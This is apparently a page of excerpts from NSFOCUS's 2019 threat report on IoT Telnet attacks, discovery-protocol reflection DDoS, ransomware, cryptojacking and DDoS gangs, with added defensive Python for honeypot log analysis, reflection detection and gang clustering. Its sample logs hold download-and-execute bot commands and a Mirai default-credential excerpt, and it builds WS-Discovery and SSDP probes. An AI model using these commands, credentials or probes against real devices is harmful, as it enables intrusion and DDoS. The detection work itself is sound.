2019 Cybersecurity Insights -16
August 19, 2020
In this section, we analyzed threats against three major protocols.
Threats Against Telnet
According to data from NSFOCUS’s threat hunting system, Telnet (TCP port 23), targeted by a total of 120,000 attack sources, was the IoT protocol most favored by attackers. Figure 7-3 shows the activity trend of Telnet attack sources from March to October 2019. The number of Telnet attack sources rose month by month from March to August, with August seeing the most attack sources (over 60,000), which carried out more than 50,000 weak password detection activities. June saw the most sample download activities (more than 40,000). Overall, the number of attack sources declined in the latter half of 2019.
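The two activity types counted above (weak password detection and sample download) can be recovered from Telnet honeypot logs. The following is an added example, not NSFOCUS’s code: it parses a constructed log format, tags login attempts that use a known default credential (a short excerpt of the credential list in the leaked Mirai scanner source), tags sessions whose commands fetch a binary, and summarises attack sources per month the way the trend figure does. The log lines, the `LOGIN`/`CMD` layout and the credential excerpt are assumptions of this example.

```python
"""Added example (not NSFOCUS's code): classify Telnet honeypot activity into
weak-password detection and sample-download events, then summarise it per
month and per attack source. The log format and all log lines below are
constructed for this example."""
import re
from collections import defaultdict

# Excerpt of the default credentials in the leaked Mirai scanner source;
# any login attempt using one of these counts as "weak password detection".
DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "xmhdipc"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("root", "54321"), ("support", "support"), ("root", ""),
    ("root", "root"), ("admin", "password"), ("user", "user"),
}

# Constructed honeypot lines: "<timestamp> <source ip> LOGIN <user>/<pass> OK|FAIL"
# or "<timestamp> <source ip> CMD <shell command as typed by the attacker>".
SAMPLE_LOG = """\
2019-08-03T10:21:05Z 203.0.113.9 LOGIN root/xc3511 FAIL
2019-08-03T10:21:07Z 203.0.113.9 LOGIN root/vizxv FAIL
2019-08-03T10:21:09Z 203.0.113.9 LOGIN admin/admin OK
2019-08-03T10:21:12Z 203.0.113.9 CMD /bin/busybox wget http://203.0.113.9/bins/x86 -O /tmp/.x; chmod 777 /tmp/.x; /tmp/.x
2019-08-03T11:02:44Z 198.51.100.23 LOGIN root/Tr0ub4dor&3 FAIL
2019-08-03T11:02:49Z 198.51.100.23 LOGIN root/correcthorse FAIL
2019-06-15T02:11:03Z 203.0.113.44 LOGIN root/123456 OK
2019-06-15T02:11:05Z 203.0.113.44 CMD cd /tmp; tftp -g -r sora.arm7 203.0.113.44; chmod +x sora.arm7; ./sora.arm7
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(LOGIN|CMD)\s+(.*)$")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")


def parse_line(line):
    """Return (month, src_ip, kind, payload) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, kind, rest = m.groups()
    return ts[:7], src, kind, rest


def profile_sources(log_text):
    """Per-source counts of login attempts, default-credential hits and sample downloads."""
    profiles = defaultdict(lambda: {"month": None, "attempts": 0,
                                    "default_cred_hits": 0, "sample_download": False})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        month, src, kind, rest = parsed
        p = profiles[src]
        p["month"] = p["month"] or month
        if kind == "LOGIN":
            cred, _result = rest.rsplit(" ", 1)   # "<user>/<pass>", "OK"/"FAIL"
            user, pw = cred.split("/", 1)         # an empty password parses as ""
            p["attempts"] += 1
            if (user, pw) in DEFAULT_CREDS:
                p["default_cred_hits"] += 1
        elif DOWNLOAD_RE.search(rest):
            p["sample_download"] = True
    return dict(profiles)


def monthly_summary(profiles):
    """Distinct sources, sources doing weak-password detection, and sources
    fetching samples, per month (the three series in the Telnet trend figure)."""
    out = defaultdict(lambda: {"sources": 0, "weak_password": 0, "sample_download": 0})
    for p in profiles.values():
        s = out[p["month"]]
        s["sources"] += 1
        s["weak_password"] += 1 if p["default_cred_hits"] > 0 else 0
        s["sample_download"] += 1 if p["sample_download"] else 0
    return dict(out)


if __name__ == "__main__":
    for month, s in sorted(monthly_summary(profile_sources(SAMPLE_LOG)).items()):
        print(month, s)
```

A source that only guesses non-default passwords (198.51.100.23 above) is still an attack source but is not counted under weak password detection, which keeps the credential list, not the attempt count, as the signal.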
2019 Cybersecurity Insights -15
August 12, 2020
Finding 1: In 2019, over 30 types of IoT vulnerability exploits were captured, most of which targeted remote command execution vulnerabilities. Though hundreds to thousands of IoT vulnerabilities are disclosed each year, only a few have an extensive impact. Attackers were keen on targeting devices exposed in large quantities (routers and video surveillance devices) so as to maximize the reach of their attacks.
Finding 2: IoT devices, especially cameras and routers, were major targets of Telnet weak password cracking attacks.
Finding 3: Since security researchers from Baidu disclosed that the Web Services Dynamic Discovery protocol (WS-Discovery, WSD; UDP port 3702) could be exploited for DDoS reflection attacks, there has been a notable increase in reflection attack events based on this protocol in the latter half of 2019. WSD reflection attacks captured by us have been on the rise since mid-August, and September saw a sharp increase in such attacks. All parties concerned, including security vendors, service providers, and telecom carriers, should pay due attention to this type of threat.
Finding 4: Approximately 2.28 million IoT devices worldwide had the UPnP/SSDP service (UDP port 1900) publicly accessible and were thus at risk of being exploited to launch DDoS reflection attacks, a decrease of 22% from 2018. The UPnP port mapping service, exposed on about 390,000 IoT devices, could be abused as a proxy or to expose intranet services to the Internet.
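Findings 3 and 4 describe the same abuse pattern on two discovery protocols: a small UDP request elicits a much larger reply, and the reply can be pointed at a spoofed source address. The following is an added example, not NSFOCUS’s code: it builds the WS-Discovery Probe and SSDP M-SEARCH requests that reflectors answer, computes the bandwidth amplification factor of a measured reply, and runs a reflection detector over constructed flow records (a destination that receives replies from many distinct hosts on source port 3702 or 1900 is being reflected at). The flow-record field names, the addresses and the byte counts are assumptions of this example; nothing is transmitted.

```python
"""Added example (not NSFOCUS's code): the discovery requests abused by
WS-Discovery (UDP/3702) and SSDP (UDP/1900) reflection, a bandwidth
amplification factor (BAF) helper, and a flow-record detector that flags a
destination receiving replies from many discovery-port sources. The flow
record layout and the records themselves are constructed; nothing is sent."""
import uuid
from collections import defaultdict

WSD_PORT = 3702   # WS-Discovery (SOAP over UDP)
SSDP_PORT = 1900  # UPnP SSDP


def wsd_probe(message_id=None):
    """Minimal WS-Discovery Probe; an exposed device answers with ProbeMatches."""
    mid = message_id or f"urn:uuid:{uuid.uuid4()}"
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" '
        'xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" '
        'xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery">'
        '<soap:Header>'
        '<wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To>'
        '<wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</wsa:Action>'
        f'<wsa:MessageID>{mid}</wsa:MessageID>'
        '</soap:Header>'
        '<soap:Body><wsd:Probe/></soap:Body>'
        '</soap:Envelope>'
    ).encode()


def ssdp_msearch(search_target="ssdp:all", mx=1):
    """SSDP M-SEARCH; ST ssdp:all makes every UPnP service on the host reply."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        "HOST: 239.255.255.250:1900\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {search_target}\r\n\r\n"
    ).encode()


def amplification_factor(request, response_bytes):
    """Bandwidth amplification factor: bytes reflected to the victim per request byte."""
    return response_bytes / len(request)


def detect_reflection(flows, reflector_ports=(WSD_PORT, SSDP_PORT), min_reflectors=3):
    """Group UDP flows whose *source* port is a discovery port by (victim, port).
    Legitimate discovery replies come from one or a few LAN devices; a destination
    receiving them from many distinct hosts is the target of a reflection attack.
    Returns {(victim_ip, port): (distinct reflectors, bytes received)}."""
    by_victim = defaultdict(lambda: {"reflectors": set(), "bytes": 0})
    for f in flows:
        if f["proto"] != "udp" or f["src_port"] not in reflector_ports:
            continue
        key = (f["dst_ip"], f["src_port"])
        by_victim[key]["reflectors"].add(f["src_ip"])
        by_victim[key]["bytes"] += f["bytes"]
    return {k: (len(v["reflectors"]), v["bytes"])
            for k, v in by_victim.items() if len(v["reflectors"]) >= min_reflectors}


# Constructed flow records (proto, src_ip, src_port, dst_ip, dst_port, bytes).
SAMPLE_FLOWS = [
    # five exposed WS-Discovery hosts all answering toward one spoofed victim
    *({"proto": "udp", "src_ip": f"203.0.113.{i}", "src_port": WSD_PORT,
       "dst_ip": "198.51.100.7", "dst_port": 40000 + i, "bytes": 3200}
      for i in range(1, 6)),
    # a genuine M-SEARCH from an internal host and a single device's reply
    {"proto": "udp", "src_ip": "10.0.0.5", "src_port": 51000,
     "dst_ip": "239.255.255.250", "dst_port": SSDP_PORT, "bytes": 94},
    {"proto": "udp", "src_ip": "10.0.0.20", "src_port": SSDP_PORT,
     "dst_ip": "10.0.0.5", "dst_port": 51000, "bytes": 350},
]

if __name__ == "__main__":
    print("WSD probe bytes:", len(wsd_probe()))
    print("SSDP M-SEARCH bytes:", len(ssdp_msearch()))
    print("reflection victims:", detect_reflection(SAMPLE_FLOWS))
```

The detector keys on the reply direction only, so an internal host that sends its own M-SEARCH and gets one answer is not flagged; the threshold on distinct reflectors is what separates discovery from reflection.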
2019 Cybersecurity Insights -14
August 5, 2020
Malware Threats from Mobile Platforms
Nowadays, smartphones are ubiquitous. Android, as a widely used mobile operating system, is targeted by an increasingly large number of malware families owing to its openness and its permission model. Such malware can even be spread via legitimate channels, including Google Play.
2019 Cybersecurity Insights -13
July 29, 2020
Cryptojacking Malware
In 2019, the rebound in cryptocurrency prices led to an increase in the number of cryptojacking malware families, among which Monero mining trojans still dominated. EternalBlue and weak password cracking were the main methods these families used to compromise large enterprises in the financial and telecom sectors and to spread. At the same time, to evade detection, cryptojacking malware families have been constantly upgraded into more variants that feature better stealth and a modular design.
2019 Cybersecurity Insights -12
July 22, 2020
Ransomware
In 2019, ransomware remained a major threat to people around the world. The most prominent families were GlobeImposter, GandCrab, and WannaCry, which were extremely active and had far more variants than others. According to NSFOCUS Security Labs’ observation, the number of ransomware families and variants increased sharply in the four months from May to August 2019, which was partly attributable to the soaring prices of major cryptocurrencies. These families used diverse compromise methods to attack a wide variety of sectors, posing a severe threat to organizations’ and individuals’ data. Through ongoing monitoring, NSFOCUS Security Labs finds that the following ransomware trends took shape in 2019:
2019 Cybersecurity Insights -11
July 15, 2020
Cryptomining Traffic
Based on security alert data from NSFOCUS Managed Security Service (MSS), we made a quantitative analysis of cryptomining activities and cryptomining hosts in enterprises in 2019 and found that the level of cryptomining activity is positively correlated with the cryptocurrency market trend.
2019 Cybersecurity Insights -10
July 10, 2020
Second Largest Gang by the Number of Attack Sources
The second largest gang in terms of the number of attack sources generated the largest attack traffic. This gang had 23,000 recidivists and favored volumetric SYN flood attacks: according to historical attack records, 99.54% of its recidivists had launched this kind of attack. This gang stayed active from January to October and was at its busiest in May.
Figure 5-14 shows the monthly trend in the number of attack sources and attack targets of this gang. The gang remained active from January to October, with more attack sources in January, April, May, and June. On average, 6,000 active attack sources launched attacks against seven targets each month.
2019 Cybersecurity Insights -9
July 8, 2020
In 2019, 7% of recidivists were responsible for 78% of DDoS attacks. Obviously, recidivists are too menacing to overlook. Several groups of DDoS recidivists often work together to launch attacks; such groups are collectively referred to as an “IP gang”. In 2019, a total of 60 DDoS gangs were detected, 15 of which contained more than 1000 attack sources. The largest gang consisted of 88,000 attack sources. On average, 35,000 attack sources remained active every month. Therefore, we should remain vigilant about gang behavior. In this section, we profile and analyze the major attack gangs.
2019 Cybersecurity Insights -8
July 7, 2020
In 2019, the most frequently seen attacks were UDP floods, SYN floods, and ACK floods, which together accounted for 82% of all DDoS attacks. By contrast, reflection attacks accounted for only 10%. Compared with 2018, reflection attacks rose slightly in number but remained a small proportion.
2019 Cybersecurity Insights -7
July 3, 2020
Key Findings:
Maturity: The technical maturity of attackers keeps growing, giving them more ways to profit beyond DDoS attacks.
Combination: Of all DDoS attacks in 2019, 12.5% employed multiple vectors. This percentage was even higher among super-sized attacks (> 300 Gbps), reaching more than one-third. Multi-vector attacks pose a greater challenge to the performance of traffic cleaning devices, the stability of cleaning links, and the effectiveness of defense operations.
Recidivists: In 2019, a total of 1.3 million DDoS recidivists (sources involved in more than 20 attacks) were spotted, 7% of which were responsible for 78% of attacks. Recidivist behavior deserves continuous attention.
Gangs: In 2019, a total of 60 DDoS gangs were detected, 15 of which contained more than 1000 attack sources. The largest gang consisted of 88,000 attack sources. On average, 35,000 attack sources remained active every month. Therefore, we should remain vigilant about gang behavior and attack groups.
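The recidivist and gang findings above (and the gang profile in Insights -9 and -10) rest on two steps: pick out sources seen in more than 20 attacks, then group recidivists that act together. The following is an added example, not NSFOCUS’s code, that carries both steps out on constructed attack records. The page defines a recidivist by attack count but does not say how NSFOCUS links recidivists into a gang; this example assumes that recidivists taking part in the same attack event belong together and takes connected components of that co-participation relation, then profiles each gang by favored vector, active months and target count as the report’s gang profiles do. The record layout, addresses and counts are constructed.

```python
"""Added example (not NSFOCUS's code): find DDoS recidivists (sources seen in
more than 20 attacks), cluster them into IP gangs by co-participation in the
same attack events (an assumed criterion), and profile each gang. All attack
records below are constructed."""
from collections import Counter, defaultdict

RECIDIVIST_MIN_ATTACKS = 21  # the page's definition: involved in more than 20 attacks


def build_sample_attacks():
    """Constructed records: (attack_id, src_ip, target_ip, vector, month).
    Gang A: 5 sources in 25 joint SYN floods, Jan-Oct. Gang B: 4 sources in 22
    joint UDP floods, Mar-Aug. Plus 30 one-off sources seen in a single attack."""
    attacks = []
    for n in range(25):
        for i in range(5):
            attacks.append((f"A{n}", f"203.0.113.{i + 1}", "198.51.100.10", "syn", 1 + n % 10))
    for n in range(22):
        for i in range(4):
            attacks.append((f"B{n}", f"198.18.0.{i + 1}", "198.51.100.20", "udp", 3 + n % 6))
    for n in range(30):
        attacks.append((f"S{n}", f"192.0.2.{n + 1}", "198.51.100.30", "ack", 1 + n % 12))
    return attacks


def find_recidivists(attacks, min_attacks=RECIDIVIST_MIN_ATTACKS):
    """Sources that took part in at least min_attacks distinct attack events."""
    per_src = defaultdict(set)
    for attack_id, src, *_ in attacks:
        per_src[src].add(attack_id)
    return {src for src, ids in per_src.items() if len(ids) >= min_attacks}


def recidivist_share(attacks, recidivists):
    """Fraction of attack events with at least one recidivist among its sources."""
    all_ids = {a[0] for a in attacks}
    rec_ids = {a[0] for a in attacks if a[1] in recidivists}
    return len(rec_ids) / len(all_ids)


def find_gangs(attacks, recidivists):
    """Union-find over recidivists: two recidivists in the same attack event are
    linked; each connected component is one gang. Largest gang first."""
    parent = {src: src for src in recidivists}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    members = defaultdict(set)
    for attack_id, src, *_ in attacks:
        if src in recidivists:
            members[attack_id].add(src)
    for srcs in members.values():
        srcs = sorted(srcs)
        for a, b in zip(srcs, srcs[1:]):
            parent[find(a)] = find(b)
    groups = defaultdict(set)
    for src in recidivists:
        groups[find(src)].add(src)
    return sorted(groups.values(), key=len, reverse=True)


def profile_gang(attacks, gang):
    """Favored vector and its share, active months, busiest month, target count."""
    vectors, months, targets = Counter(), Counter(), set()
    for _attack_id, src, target, vector, month in attacks:
        if src in gang:
            vectors[vector] += 1
            months[month] += 1
            targets.add(target)
    vector, n = vectors.most_common(1)[0]
    return {"size": len(gang), "favored_vector": vector,
            "vector_share": n / sum(vectors.values()),
            "active_months": sorted(months),
            "busiest_month": months.most_common(1)[0][0],
            "targets": len(targets)}


if __name__ == "__main__":
    atk = build_sample_attacks()
    rec = find_recidivists(atk)
    print(f"{len(rec)} recidivists in {recidivist_share(atk, rec):.0%} of attacks")
    for gang in find_gangs(atk, rec):
        print(profile_gang(atk, gang))
```

On real data the co-participation graph is far denser than in this sample, so a practitioner would usually require a minimum number of shared events (or shared targets within a time window) before linking two recidivists, to avoid merging unrelated gangs that happened to hit one popular target.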